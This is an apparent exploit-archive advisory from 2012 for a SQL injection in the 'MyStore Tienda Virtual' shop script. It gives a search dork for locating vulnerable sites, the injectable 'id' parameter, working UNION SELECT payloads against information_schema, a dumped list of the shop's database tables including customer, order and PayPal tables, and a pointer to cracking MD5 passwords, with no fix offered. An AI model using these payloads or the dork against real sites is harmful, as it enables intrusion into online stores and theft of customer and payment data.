MyStore Tienda Virtual SQL Injection Vulnerability

2012-01-03 00:15:05

========================================================================================
| # Title : SQL Injection MyStore Tienda Virtual |
| # Author : Arturo Zamora |
| # email : [email protected] |
| # DAte : 02/01/2012 |
| # Verified : yes |
| # Risk : High |
| # Published: |
| # Script : MyStore Tienda Virtual http://www.mystore.com.mx/ |
| # Dork : inurl:art_detalle.php?id= |
====================== zeux0r 2012 =================================
Exploit :
======================

http://localhost/path/art_detalle.php?id={sqli}

======================
Example:
======================

http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--

http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--

======================
dbs:
======================
articulos
articulos_nivel3
articulos_relacionados
articulos_secciones
atajada
atajadausa
ayuda
ayudausa
banners
banners_conteo
banners_lateral
banners_lateralusa
basket
campania
clientesclientes_envio
clientes_facturacion
colores
comentario
comisionistas
comisionistas_hits
comisionistas_modulos
contacto
descuentos
descuentos_cruzados
descuentos_temp
especificacion
home
homeusa
justin
justinusa
mensajeria
mensajeriausa
mixer
newsletter
newsletter_mensaje
nivel1
nivel2
nivel3
parametros
paypal
pedidos
pedidos_detalle
pedidos_detalleusa
pedidosusa
remate
remateusa
secciones
shopper
sol_info
talisman
tallas
ticker
tickerusa
visitas

======================
Information :
======================

password decrypt md5

======================

I Love U Pumosita

www.insecure.org.mx

================================ Mexican shotos ========================================
Greetz : * zer0-zo0rg * Bucio * Xoxonaizer * Maztor *
-------------------------------------------------------------------------------------------

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.